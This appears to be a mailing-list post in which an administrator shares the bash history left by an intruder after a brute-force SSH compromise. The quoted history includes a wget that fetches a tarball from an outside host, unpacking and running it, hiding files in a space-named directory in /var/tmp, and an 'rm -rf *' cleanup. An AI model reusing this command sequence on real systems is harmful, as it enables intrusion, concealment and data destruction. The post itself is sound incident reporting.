[Date Prev][Date Next]   [Thread Prev][Thread Next]   [Thread Index] [Date Index] [Author Index]

[K12OSN] OT: Break-In report

I thought you guys might be interested in seeing the tracks of a computer break-in. I won't say whose system it was (to protect the embarassed), but the break-in was nothing but a brute-force ssh attempt at guessing usernames and passwords. A regular user account was compromised and here is his bash history:

cd who
cd /var/tmp
ls -a
cd " mkdir " "
cd " "
wget quest.dif.jp/x.tgz
tar zxvf x.tgz
cd x
./start dbdb
cd ..
ls -a
rm -rf *
ls -a
ps aux
ps aux | grep dan  (note: the hacked user account was "dan")

I particularly like the use of " " as a directory name. Nice and invisible. Also note that the invader put his files in two directories which have the "sticky" bit set: /dev/shm and /var/tmp

In the end, it seems that all the invader succeeded in doing was a bunch of port-scanning. The OS is going to be re-installed anyway, just to be safe.

Are there any organizations out there that this should be reported to? (For instance, the way one might send reports to an antivirus group or a content filtering group).


[Date Prev][Date Next]   [Thread Prev][Thread Next]   [Thread Index] [Date Index] [Author Index]